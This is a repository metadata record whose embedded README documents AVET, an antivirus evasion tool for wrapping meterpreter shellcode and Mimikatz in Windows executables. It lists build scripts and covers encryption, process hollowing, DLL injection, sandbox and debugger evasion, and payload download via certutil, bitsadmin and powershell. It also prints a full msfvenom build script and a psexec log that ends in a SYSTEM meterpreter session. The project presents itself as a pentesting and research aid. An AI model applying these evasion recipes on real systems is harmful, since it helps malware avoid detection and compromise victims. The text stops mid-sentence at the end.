{"id":13474555,"url":"https://github.com/govolution/avet","last_synced_at":"2025-05-15T17:08:06.751Z","repository":{"id":41243227,"uuid":"80290293","full_name":"govolution/avet","owner":"govolution","description":"AntiVirus Evasion Tool","archived":false,"fork":false,"pushed_at":"2023-10-12T15:00:05.000Z","size":4693,"stargazers_count":1694,"open_issues_count":1,"forks_count":338,"subscribers_count":86,"default_branch":"master","last_synced_at":"2025-04-18T18:35:29.738Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/govolution.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2017-01-28T14:56:47.000Z","updated_at":"2025-04-18T17:36:16.000Z","dependencies_parsed_at":"2023-10-12T23:01:24.126Z","dependency_job_id":null,"html_url":"https://github.com/govolution/avet","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/govolution%2Favet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/govolution%2Favet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/govolution%2Favet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/govolution%2Favet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/govolution","download_url":"https://codeload.github.com/govolution/avet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254384988,"owner
s_count":22062422,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T16:01:13.149Z","updated_at":"2025-05-15T17:08:01.736Z","avatar_url":"https://github.com/govolution.png","language":"Shell","readme":"# AntiVirus Evasion Tool\n\n\nAVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques, as well as other methods used by malicious software.\nFor an overview of new features in **v2.4**, as well as past version increments, have a look at the **CHANGELOG** file.\n\n\n## Table of Contents\n- [Installation](#installation)\n- [Docker](#docker)\n- [AVET the easy way](#avet-the-easy-way)\n- [AVET the normal way](#avet-the-normal-way)\n- \u003cdetails\u003e\u003csummary\u003eDocumentation (\u003ci\u003eclick to expand\u003c/i\u003e)\u003c/summary\u003e\n\n  - [Data retrieval methods](#data-retrieval-methods)\n  - [Encryption and Encoding](#encryption-and-encoding)\n  - [Sandbox evasion](#sandbox-evasion)\n  - [Additional command execution](#additional-command-execution)\n  - [Helper tools](#helper-tools)\n  - [AVET \u0026 metasploit psexec](#avet-\u0026-metasploit-psexec)\n  - [Adversarial Examples](#adversarial-examples)\n  \u003c/details\u003e\n- [More](#more)\n\n\n### Some features\n- when running a .exe file made with msfpayload \u0026 co, the file will often be recognized by antivirus software\n- AVET is an antivirus evasion tool targeting windows machines with executable files\n- different kinds of input payloads can be used now: shellcode, exe and dlls\n- more 
techniques available: shellcode/dll injection, process hollowing and more\n- flexible retrieval methods for payload, decryption key, etc.\n- usage as a dropper\n- Chaining multiple iterations of AVET enables you to add multiple evasion layers, if necessary\n- combination of techniques: download your encrypted payload via powershell, while supplying the decryption key via command line argument at execution time, and finally inject your payload into another process, choosing from multiple techniques\n- basic sandbox checks\n- generation of adversarial examples against static detectors based on machine learning\n- execute all available build scripts with build_script_tester.py, might also be interesting for researchers for building a set of \"malicious\" samples using different evasion and injection techniques\n\n\n### Important Note\n\nNot all techniques will evade every AV engine. If one technique or build script does not work, please test another one.\nFeel free to experiment! After all this is a toolbox - yet you should wield the hammer yourself.\n\n## Installation\n\n__The Installtion Instruction applies for Kali 64bit and tdm-gcc!__\n\nYou can use the setup script:\n```bash\n./setup.sh\n```\n\nThis should automatically get you started by installing/configuring wine and installing tdm-gcc.\nYou'll shortly have to click through the tdm-gcc installer GUI though - standard settings should be fine.\nThe script will also ask if you want to install AVET's dependencies, which are needed to use some of the build scripts. 
The fetched dependencies will be put into separate folders next to the avet folder.\n\n\nDependencies will grab the latest releases of:\n- [pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode)\n- [mimikatz](https://github.com/gentilkiwi/mimikatz)\n- [DKMC](https://github.com/Mr-Un1k0d3r/DKMC)\n\n\nIf for whatever reason you want to install wine and tdm-gcc manually:\n- [How to install tdm-gcc with wine](https://govolution.wordpress.com/2017/02/04/using-tdm-gcc-with-kali-2/)\n\n## Docker\n\nIf you are not using Kali or don't want to install Metasploit on your system, you can use the Docker Container instead.\nThe container encapsulates Metasploit and avet and the samples will be created in your current directory.\nIt is also possible to use an graphical text editor like gedit.\n\nBuilding the container:\n```bash\nsudo docker build -t avet:v0.1 .\n```\nUsage:\n```bash\nsudo docker run -it --net=host --env=\"DISPLAY\" --volume=\"$HOME/.Xauthority:/root/.Xauthority:rw\" -v $(pwd):/tools/avet/output avet:v0.1 /bin/bash\n```\nFor a better experience it is recommend to alias this.\n```bash\n# In your .bash_profile, .bashrc or .bash_aliases\n\nalias avet='sudo docker run -it --net=host --env=\"DISPLAY\" --volume=\"$HOME/.Xauthority:/root/.Xauthority:rw\" -v $(pwd):/tools/avet/output avet /bin/bash'\n```\n\n\n## AVET the easy way\n\n**avet.py** is a small Python utility which was designed to assist you in using the tool.\n\nIt lists all scripts that are currently present in the build folder. After selecting one, you will be able to step through the script line by line, having the opportunity to modify the contents on the fly.\n\nThe latter is especially useful as you can define new LHOST and LPORT variables for msfvenom each time you run a build script via the fabric. 
\nYou can define default LHOST and LPORT values in the `/build/global_connect_config.sh` file, which are used if you don't redefine.\n\nThese modifications are temporary, which means that any changes you made will not persist in the build script on disk.\nThe modified version is executed once, and your executable built.\n\n\u003cdetails\u003e\n\u003csummary\u003eHere is a quick example (\u003ci\u003eClick to expand\u003c/i\u003e):\u003c/summary\u003e\n\n```\npython3 avet.py\n\n                       .|        ,       +\n             *         | |      ((             *\n                       |'|       `    ._____\n         +     ___    |  |   *        |.   |' .---\"|\n       _    .-'   '-. |  |     .--'|  ||   | _|    |\n    .-'|  _.|  |    ||   '-__  |   |  |    ||      |\n    |' | |.    |    ||       | |   |  |    ||      |\n ___|  '-'     '    \"\"       '-'   '-.'    '`      |____\njgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n\nWelcome to the avet Assistant!\n\n0 : build_40xshikata_revhttpsunstaged_win32.sh\n1 : build_50xshikata_quiet_revhttps_win32.sh\n2 : build_50xshikata_revhttps_win32.sh\n3 : build_asciimsf_fromcmd_revhttps_win32.sh\n4 : build_asciimsf_revhttps_win32.sh\n5 : build_avetenc_dynamicfromfile_revhttps_win32.sh\n6 : build_avetenc_fopen_revhttps_win32.sh\n7 : build_avetenc_mtrprtrxor_revhttps_win64.sh\n8 : build_calcfromcmd_50xshikata_revhttps_win32.sh\n9 : build_calcfrompowersh_50xshikata_revhttps_win32.sh\n10 : build_checkdomain_rc4_mimikatz.sh\n11 : build_cpucores_revhttps_win32.sh\n12 : build_disablewindefpsh_xorfromcmd_revhttps_win64.sh\n13 : build_dkmc_downloadexecshc_revhttps_win32.sh\n14 : build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh\n15 : build_downloadbitsadmin_revhttps_win32.sh\n16 : build_downloadcertutil_revhttps_win32.sh\n17 : build_downloadcurl_mtrprtrxor_revhttps_win64.sh\n18 : build_downloadiexplorer_revhttps_win32.sh\n19 : build_downloadpsh_revhttps_win32.sh\n20 : 
build_downloadsocket_mtrprtrxor_revhttps_win64.sh\n21 : build_downloadsocket_revhttps_win32.sh\n22 : build_dynamicfromfile_revhttps_win32.sh\n23 : build_fibonacci_rc4_mimikatz.sh\n24 : build_fopen_mtrprtrxor_revhttps_win64.sh\n25 : build_fopen_quiet_revhttps_win32.sh\n26 : build_fopen_revhttps_win32.sh\n27 : build_getchar_rc4_mimikatz.sh\n28 : build_gethostbyname_revhttps_win32.sh\n29 : build_hasvmkey_revhttps_win32.sh\n30 : build_hasvmmac_revtcp_win32.sh\n31 : build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win64.sh\n32 : build_hollowing_targetfromcmd_doubleenc_doubleev_revtcp_win32.sh\n33 : build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh\n34 : build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh\n35 : build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh\n36 : build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh\n37 : build_kaspersky_fopen_shellrevtcp_win32.sh\n38 : build_mimikatz_pe2shc_xorfromcmd_win64.sh\n39 : build_pause_rc4_mimikatz.sh\n40 : build_rc4_interactive_pwsh_mimikatz_win64.sh\n41 : build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh\n42 : build_rc4enc_mimikatz_win64.sh\n43 : build_sleep_rc4_mimikatz.sh\n44 : build_sleepbyping_rc4_mimikatz.sh\n45 : build_timedfibonacci_rc4_mimikatz.sh\n46 : buildsvc_20xshikata_bindtcp_win32.sh\n\nWhich Script would you like to configure and build?\nEnter the corresponding number -\u003e 43\n\nDESCRIPTION :\n# RC4-encrypt the payload with a static, preset key.\n# Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode.\n# pe_to_shellcode is written by Hasherezade:\n# https://github.com/hasherezade/pe_to_shellcode\n\n# This script expects the Mimikatz executable to be at input/mimikatz.exe\n# and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe\n\nConfigure the Build Script\n\n# enable debug output\n-\u003e 
enable_debug_print\n\n# generate key file with preset key\n-\u003e generate_key preset aabbccdd1122\n\nDo you want to add sandbox evasions? [y/N]\n-\u003e N\n\nExecutable will be created Shortly please wait.\n\n*** ============================================= ***\n\n         .==,_                                          \n        .===,_`\\\\                                        \n      .====,_ ` \\\\      .====,__                         \n---     .==-,`~. \\\\           `:`.__,                    \n ---      `~~=-.  \\\\           /^^^     MEEP MEEP        \n   ---       `~~=. \\\\         /                          \n                `~. \\\\       /                           \n                  ~. \\\\____./                            \n                    `.=====)                            \n                 ___.--~~~--.__                         \n       ___\\\\.--~~~              ~~~---.._|/              \n       ~~~\\\\\\\"                             /              \n\n ________  ___      ___ _____  __________  \n|\\   __  \\|\\  \\    /  /|\\  __\\ |\\___   __\\ \n\\ \\  \\|\\  \\ \\  \\  /  / | \\ \\__ \\|__|\\  \\_| \n \\ \\   __  \\ \\  \\/  / / \\ \\  _\\    \\ \\  \\  \n  \\ \\  \\ \\  \\ \\    / /   \\ \\ \\___   \\ \\  \\ \n   \\ \\__\\ \\__\\ \\__/ /     \\ \\____\\   \\ \\__\\\n    \\|__|\\|__|\\|__|/       \\|_____|   \\|__|\n\n*** ============================================= ***\n\nReading module from: input/mimikatz.exe\n[WARNING] This is a console application! 
The recommended subsystem is GUI.\n[+] Saved as: input/sc_raw.txt\nStarting RC4 encoder...\nReading payload from file input/sc_raw.txt, expecting raw format.\npayload size in bytes is 1309884\nReading key from file input/key_raw.txt, expecting raw format.\nKey length in bytes is 6\nApplying RC4 algorithm\nWriting payload to file input/sc_enc_raw.txt\n\n# The decryption key is aabbccddee if it has not been changed.\n# You need to provide the decryption key as 2nd command line argument.\n# Call generated executable on target like:\n# $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee']  [decryption key]\n\n\nYour executable should be in the output folder!\n```\n\u003c/details\u003e\n\n## AVET the normal way\n\nOf course it is possible to run all commands step by step from command line. However, in the \"build\" folder you will find preconfigured build scripts for relevant use cases. \nThe build scripts themselves are written so as they have to be called from within the avet directory:\n```bash\nkali@kali:~/tools/avet$ ./build/build_fopen_mtrprtrxor_revhttps_win64.sh\n```\n\nYou can define default LHOST and LPORT values for metasploit payloads in the `/build/global_connect_config.sh` file, which are used if you don't redefine.\n\n\n### Usage examples\n\nGenerate a 32-bit process hollowing executable in two steps (as in build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win32.sh):\n\nFirst, generate the hollowing payload with AVET:\n- generate meterpreter/reverse_https 32-bit shellcode\n- the meterpreter shellcode will be XOR encrypted with a 5-byte preset key\n- the shellcode will be compiled into the generated executable\n- fopen and gethostbyname sandbox evasion environmental checks will be made before executing the shellcode\n\t\nSecond, build the \"dropper\" executable that delivers the first step payload via hollowing:\n- statically compile the first step payload into the executable\n- the payload will be XOR encrypted with a different 
5-byte preset key\n- again, fopen and gethostbyname sandbox evasion environmental checks will be made before hollowing\n- the hollowing target PID will be delivered via command line argument on execution time\n\t\nSo you get a two-layer environmental-checked and encrypted meterpreter payload, hollowed into a process of your choice.\nWhile the settings in the build script are mostly for demonstration purposes, there is a lot of flexibility to customize your generated executable by making simple modifications to the build script.\n\nYou could switch out data retrieval methods: Instead of statically compiling most data into the executable, you could download your hollowing payload via powershell, download the decryption key via sockets, use different encryption or environmental checks, etc.\n\nOr try to add more evasion layers by doing a third build iteration.\nOr switch out the payload. Want to use Mimikatz instead? Convert it into shellcode via https://github.com/hasherezade/pe_to_shellcode, and change the payload in the build script.\n\nOf course, you can also design more minimalistic builds, like executing unencrypted shellcode with only one environmental check, or maybe 50 iterations of shikata are enough to reach your goal?\nChoose/modify the build scripts, suiting your needs.\n\n\n### Build scripts\n\nBelow, find a list of all currently shipped build scripts. 
The names should hint at each script's functionality.\nFor detailed information, consider the comments inside the scripts.\nFeel free to modify/write your own build scripts to build your custom executable!\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003ci\u003eClick to expand\u003c/i\u003e\u003c/summary\u003e\n\n  ```\n  build_40xshikata_revhttpsunstaged_win32.sh\n  build_50xshikata_revhttps_win32.sh\n  build_50xshikata_quiet_revhttps_win32.sh\n  build_asciimsf_fromcmd_revhttps_win32.sh\n  build_asciimsf_revhttps_win32.sh\n  build_avetenc_dynamicfromfile_revhttps_win32.sh\n  build_avetenc_fopen_revhttps_win32.sh\n  build_avetenc_mtrprtrxor_revhttps_win64.sh\n  build_calcfromcmd_50xshikata_revhttps_win32.sh\n  build_calcfrompowersh_50xshikata_revhttps_win32.sh\n  build_cpucores_revhttps_win32.sh\n  build_checkdomain_rc4_mimikatz.sh\n  build_disablewindefpsh_xorfromcmd_revhttps_win64.sh\n  build_dkmc_downloadexecshc_revhttps_win32.sh\n  build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh\n  build_downloadbitsadmin_revhttps_win32.sh\n  build_downloadcertutil_revhttps_win32.sh\n  build_downloadcurl_mtrprtrxor_revhttps_win64.sh\n  build_downloadiexplorer_revhttps_win32.sh\n  build_downloadpsh_revhttps_win32.sh\n  build_downloadsocket_mtrprtrxor_revhttps_win64.sh\n  build_downloadsocket_revhttps_win32.sh\n  build_dynamicfromfile_revhttps_win32.sh\n  build_fibonacci_rc4_mimikatz.sh\n  build_fopen_mtrprtrxor_revhttps_win64.sh\n  build_fopen_quiet_revhttps_win32.sh\n  build_fopen_revhttps_win32.sh\n  build_getchar_rc4_mimikatz.sh\n  build_gethostbyname_revhttps_win32.sh\n  build_hasvmkey_revhttps_win32.sh\n  build_hasvmmac_revtcp_win32.sh\n  build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win64.sh\n  build_hollowing_targetfromcmd_doubleenc_doubleev_revtcp_win32.sh\n  build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh\n  build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh\n  
build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh\n  build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh\n  build_kaspersky_fopen_shellrevtcp_win32.sh\n  build_mimikatz_pe2shc_xorfromcmd_win64.sh\n  build_pause_rc4_mimikatz.sh\n  build_rc4_interactive_pwsh_mimikatz_win64.sh\n  build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh\n  build_rc4enc_mimikatz_win64.sh\n  build_sleep_rc4_mimikatz.sh\n  build_sleepbyping_rc4_mimikatz.sh\n  build_timedfibonacci_rc4_mimikatz.sh\n  buildsvc_20xshikata_bindtcp_win32.sh\n  ```\n\u003c/details\u003e\n\n\n## Documentation\n\n### Data retrieval methods\nThese methods are compatible with all of AVET's data sources and can be used as such in the build script.\n\nA few examples:\n```\n# Compiles the command 'calc.exe' statically into the executable, which will then be executed via cmd at sample startup.\nset_command_source static_from_here 'calc.exe'\nset_command_exec exec_via_cmd\n\n# Download 64-bit shellcode via powershell, and execute. \nset_payload_source download_powershell\nset_payload_execution_method exec_shellcode64\n\n# Download XOR decryption key into memory. (Server to download from is always specified via first command line argument on execution). 
Decode the payload.\nset_key_source download_socket\nset_decoder xor\n\n# Retrieves the tuple (target PID, dll path) from command line on execution\nset_payload_info_source from_command_line_raw\nset_payload_execution_method inject_dll\n```\nIf features are skipped/not used, you have to specify NOP-like behavior instead:\n```\nset_command_source no_data\nset_command_exec no_command\n```\n\n#### static_from_file\nThe data is retrieved from a file and is statically compiled into the generated executable.\nFor this to work, the data must be provided as a c-style array at compilation time, like\n```\nunsigned char buf[] = \"\\x00\\x11\\x22\\x33\";\n```\n\n#### static_from_here\nThe data is statically compiled into the generated executable,\nretrieved from the specified argument in the build script.\n\n#### dynamic_from_file\nThe data is read from a file at run time.\n\n#### from_command_line_hex\nRetrieves data from a \"11aabb22..\" format hex string (from the command line).\n\n#### from_command_line_raw\nRetrieves data from a command line argument. 
The given ASCII string is interpreted as raw byte data.\n\n#### download_certutil\nDownloads data from a specified URI, using ```certutil.exe -urlcache -split -f```.\nDrops the downloaded file to disk before reading the data.\n\n#### download_curl\nDownloads the data using curl.\nDrops the downloaded file to disk before reading the data.\n\n#### download_internet_explorer\nDownloads data from a specified URL, using Internet Explorer.\nDrops the downloaded file to disk before reading the data.\n\n#### download_powershell\nDownloads data from a specified URI via powershell.\nDrops the downloaded file to disk before reading the data.\n\n#### download_socket\nDownloads the data from a specified URI, using sockets.\nData is read directly into memory, no file is dropped to disk.\n\n#### download_bitsadmin\nDownloads the data using the BITSAdmin Windows utility.\nDrops the downloaded file to disk before reading the data.\n\n\n### Payload execution methods\nHow to execute/deliver the payload. The injection/hollowing methods require additional information about the injection target, which can be given via ```set_payload_info_source \u003cthe_info\u003e``` (see data retrieval methods).\n\n#### exec_shellcode\nExecutes 32-bit shellcode with a C function binding.\n\n#### exec_shellcode64\nExecutes 64-bit shellcode with a C function binding and VirtualProtect.\n\n#### exec_shellcode_ASCIIMSF\nExecutes ASCIIMSF encoded shellcode via ```call eax```.\n\n#### hollowing32\nInstanciates a new process, cuts out the original image and hollows the given payload into the new process.\nThe payload is a 32-bit executable image. 
Works on 32-bit targets.\n\n#### hollowing64\nSame as hollowing32, but using 64-bit PE payloads for 64-bit target processes.\n\n#### inject_dll\nInjects a dll into a target process, using ```CreateRemoteThread```.\nInjection works for 32-bit payloads into 32-bit processes, and 64-bit payloads into 64-bit processes, respectively.\n\n#### inject_shellcode\nInjects shellcode into a target process, using ```CreateRemoteThread```.\nInjection works for 32-bit shellcode into 32-bit processes, and 64-bit shellcode into 64-bit processes, respectively.\n\n\n### Encryption and Encoding\nAVET provides encoders for each scheme, which can be applied on the payload before compilation/delivery.\nOn execution, the specified decoder then again deobfuscates the payload at runtime.\n\nHere is an RC4 example, where the decryption key is retrieved from the command line in hex format at execution time:\n```\ngenerate_key preset aabbccddee input/key_raw.txt\nencode_payload rc4 input/shellcode_raw.txt input/shellcode_enc_raw.txt input/key_raw.txt\nset_key_source from_command_line_hex\nset_decoder rc4\n```\n\nYou can also skip the encoding feature by not further encoding the shellcode, and setting:\n```\nset_key_source no_data\nset_decoder none\n```\n\n#### xor\nRolling XOR, supporting multi-byte keys.\n\n#### avet\nCustom encoding, reinterpreting the ASCII format.\n\n#### rc4\nRC4 encryption/decryption, with flexible key length.\n\n\n### Debugger and Sandbox evasion\nThese are environmental checks that are performed before eventual encoding and payload execution.\nIf an unpleasant execution environment is detected (e.g. an AV sandbox), execution stops.\n\nCurrently, you can arbitrarily queue up to 10 checks. 
Using the same technique multiple times is supported.\nThe queue limit *EVASION_ARRAY_SIZE* can however be easily modified in *avet.c*.\n\n#### is debugger present\nCheck with isDebuggerPresent() function if a debugger is present.\nExit if true.\n```\nadd_evasion is_debugger_present\n```\n\n#### sleep\nSleep for certain time before execution. The duration(in Seconds) can be specified in the build script, like\n\n```\n# sleep for 3 seconds\nadd_evasion evasion_by_sleep 3\n```\n\n#### sleep by ping\nHalt execution of the program for specified seconds by invoking a timed ping command against localhost.\nThe program pings once each second.\n```\nadd_evasion sleep_by_ping 4\n```\n\n#### check fast forwarding\nCheck if sandbox utilize fast forwarding to reduce heuristic check time. Local time and sleep is used.\n```\nadd_evasion check_fast_forwarding\n```\n\n#### get tickcount\nCheck if sandbox utilize fast forwarding to reduce heuristic check time. Uptime and sleep is used.\n```\nadd_evasion get_tickcount\n```\n\n#### Username\nGet username and compare with given username. Exit if it does not match.\n\n```\nadd_evasion has_username 'IEUser'\n```\n\n#### Messagebox\nSpawn simple Messagebox before execution. If Arithmetic is not solved correctly, the program exits.\n```\nadd_evasion interaction_msg_box\n```\n\n#### getchar\nWait until input is delivered using getchar.\n```\nadd_evasion interaction_getchar\n```\n\n#### system pause\nExecute system(\"pause\"), causing the spawned cmd (and our main process) to wait for any keypress.\n```\nadd_evasion interaction_system_pause\n```\n\n#### fopen\nChecks for the existence of a file. If not found, stop execution.\nThe file name can be specified in the build script, like\n```\nadd_evasion fopen_sandbox_evasion 'c:\\\\windows\\\\system.ini'\n```\n\n#### bios info\nChecks if it is possible to fetch SMBIOS firmware table. 
Stop execution if not.\n\n```\nadd_evasion get_bios_info\n```\n\n#### gethostbyname\nTry to resolve a hostname of your choice. If gethostbyname returns unequals NULL, stop execution.\nThe hostname to check against can be specified in the build script, like\n```\nadd_evasion gethostbyname_sandbox_evasion 'testdomain.com'\n```\n\n#### get_cpu_cores\nChecks number of CPU cores on the target. If the number is lower than the specified value, stop execution.\n```\nadd_evasion get_cpu_cores 2\n```\n\n#### has_vm_mac\nChecks for vendor-specific MAC prefixes. If any identified, stop execution.\n```\nadd_evasion has_vm_mac\n```\n\n#### has_vm_regkey\nChecks for vendor-specific registry keys. If any identified, stop execution.\n```\nadd_evasion has_vm_regkey\n```\n\n#### hide_console\nNot really an evasion technique, but hides your console window ;)\n```\nadd_evasion hide_console\n```\n\n#### Installation Date\nFetch Installation date of Windows and compare it to the specified one. If the dates do not match, stop execution. The date needs to be specified in format dd/mm/yyyy.\n\n```\nadd_evasion get_install_date '24/11/2007'\n```\n\n#### Number of Processes\nCount the number of running Processes. If the number of the processes is smaller than given threshold, stop execution.\n\n```\nadd_evasion get_num_processes 50\n```\n\n#### Standard Browser\nRead Registry Key to get the default Browser. If the Browser does not match with given value, stop execution. 
Possible values are  MSEdgeHTM, Firefox or ChromeHTML.\n\n```\nadd_evasion get_standard_browser 'Firefox'\n```\n\n#### Domain\nQueries the DNS domain the target is in.\nIf the target is not in the expected domain as specified, the program exits.\n```\nadd_evasion get_computer_domain 'domain.com'\n```\n\n#### Computation\nFibonacci\n\nCompute specified iterations of the Fibonacci series.\nWill likely produce false results for greater n due to integer boundaries.\n```\n# 10 iterations\nadd_evasion computation_fibonacci 10\n```\n\nTimed Fibonacci\n\nStops Fibonacci computations after approximately specified seconds.\n```\n# Stops computation after 20 seconds\nadd_evasion computation_timed_fibonacci 20\n```\n\n\n#### Folders and more\nCheck if Artifact exists, stop execution if not. Paths must be in Unix style.\n\nBackground wallpaper:\n```\nadd_evasion has_background_wp\n```\n\n\nCheck for folder:\n```\nadd_evasion has_folder 'C:/Users/user/Downloads/'\n```\n\nCheck for Public Desktop:\n```\nadd_evasion has_public_desktop\n```\n\nCheck for Recycle Bin\n```\nadd_evasion has_recycle_bin\n```\n\nCheck for recent file folder\n```\nadd_evasion has_recent_files\n```\n\nCheck for network drive\n```\nadd_evasion has_network_drive\n```\n\n\n### Additional command execution\nGrants you the ability to execute an additional cmd/powershell payload directly after the eventual sandbox evasion functions.\nThe payload source is compatible with AVET's data retrieval methods.\n\nThe following example downloads a powershell payload via BITSAdmin: \n```\nset_command_source download_bitsadmin\nset_command_exec exec_via_powershell\n```\n\n\n### Helper tools\n\n#### data_raw_to_c\nTakes raw data as input from a file, converts it into C-array format and writes output to another file.\nThis aids in providing the correct format for the static_from_file data retrieval method.\n\n#### generate_key\nKey generation utility. 
Generates either a (non-cryptographically) random key or takes a preset key as input,\nand outputs the raw key data into a specified file.\nThis aids in providing key material for the AVET encryption feature.\n\n#### sh_format\nUtility from AVET 1.3 that performs AVET encoding.\n\n\n## AVET \u0026 metasploit psexec\n\nAVET is compatible to metasploit's psexec module. For that, the generated executable needs to be compiled as a Windows Service, which is implemented by using *avetsvc.c*. Consider the corresponding example build script\n\n*build_svc_20xshikata_bindtcp_win32.sh*:\n\n```\n#!/bin/bash          \n# Designed for use with msf psexec module!\n\n# print AVET logo\ncat banner.txt\n\n# include script containing the compiler var $win32_compiler\n# you can edit the compiler in build/global_win32.sh\n# or enter $win32_compiler=\"mycompiler\" here\n. build/global_win32.sh\n\n# import global default lhost and lport values from build/global_connect_config.sh\n. build/global_connect_config.sh\n\n# override connect-back settings here, if necessary\nLPORT=$GLOBAL_LPORT\n\n# make meterpreter bind payload, encoded 20 rounds with shikata_ga_nai\nmsfvenom -p windows/meterpreter/bind_tcp lport=$LPORT -e x86/shikata_ga_nai -i 20 -f raw -a x86 --platform Windows \u003e input/sc_raw.txt\n\n# import feature construction interface\n. 
build/feature_construction.sh\n\n# add evasion techniques\nadd_evasion fopen_sandbox_evasion 'c:\\\\windows\\\\system.ini'\nadd_evasion gethostbyname_sandbox_evasion 'this.that'\n\n# generate key file\ngenerate_key preset aabbcc12de input/key_raw.txt\n\n# encode shellcode\nencode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt\n\n# array name buf is expected by static_from_file retrieval method\n./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf\n\n# no command preexec\nset_command_source no_data\nset_command_exec no_command\n\n# set shellcode source\nset_payload_source static_from_file input/scenc_c.txt\n\n# convert generated key from raw to C into array \"key\"\n./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key\n\n# set key source\nset_key_source static_from_file input/key_c.txt\n\n# set payload info source\nset_payload_info_source no_data\n\n# set decoder\nset_decoder xor\n\n# set shellcode binding technique\nset_payload_execution_method exec_shellcode\n\n# enable debug printing\nenable_debug_print to_file C:/avetdbg.txt\n\n# compile as service\n$win32_compiler -o output/service.exe source/avetsvc.c -lws2_32\nstrip output/service.exe\n\n# cleanup\ncleanup_techniques\n```\n\nAnd on the metasploit side:\n```\nmsf exploit(psexec) \u003e use exploit/windows/smb/psexec\nmsf exploit(psexec) \u003e set EXE::custom /root/tools/ave/pwn.exe\nEXE::custom =\u003e /root/tools/ave/pwn.exe\nmsf exploit(psexec) \u003e set payload windows/meterpreter/bind_tcp\npayload =\u003e windows/meterpreter/bind_tcp\nmsf exploit(psexec) \u003e set rhost 192.168.116.183\nrhost =\u003e 192.168.116.183\nmsf exploit(psexec) \u003e set smbuser dax\nsmbuser =\u003e dax\nmsf exploit(psexec) \u003e set smbpass test123\nsmbpass =\u003e test123\nmsf exploit(psexec) \u003e set lport 8443\nlport =\u003e 8443\nmsf exploit(psexec) \u003e run\n\n[*] 192.168.116.183:445 - Connecting to the server...\n[*] Started bind handler\n[*] 
192.168.116.183:445 - Authenticating to 192.168.116.183:445 as user 'dax'...\n[*] Sending stage (957487 bytes) to 192.168.116.183\n[*] 192.168.116.183:445 - Selecting native target\n[*] 192.168.116.183:445 - Uploading payload...\n[*] 192.168.116.183:445 - Using custom payload /root/tools/avepoc/a.exe, RHOST and RPORT settings will be ignored!\n[*] 192.168.116.183:445 - Created \\mzrCIOVg.exe...\n[+] 192.168.116.183:445 - Service started successfully...\n[*] 192.168.116.183:445 - Deleting \\mzrCIOVg.exe...\n[-] 192.168.116.183:445 - Delete of \\mzrCIOVg.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)\n[*] Exploit completed, but no session was created.\nmsf exploit(psexec) \u003e [*] Meterpreter session 4 opened (192.168.116.142:33453 -\u003e 192.168.116.183:8443) at 2017-05-27 18:47:23 +0200\n\nmsf exploit(psexec) \u003e sessions\n\nActive sessions\n===============\n\nId Type Information Connection\n-- ---- ----------- ----------\n4 meterpreter x86/windows NT-AUTORIT_T\\SYSTEM @ DAX-RYMZ48Z3EYO 192.168.116.142:33453 -\u003e 192.168.116.183:8443 (192.168.116.183)\n\nmsf exploit(psexec) \u003e sessions -i 4\n[*] Starting interaction with 4...\n\nmeterpreter \u003e sysinfo\nComputer : DAX-RYMZ48Z3EYO\nOS : Windows XP (Build 2600, Service Pack 3).\nArchitecture : x86\nSystem Language : de_DE\nDomain : ARBEITSGRUPPE\nLogged On Users : 2\nMeterpreter : x86/windows\n```\n\n## Adversarial Examples\nAdversarial examples are 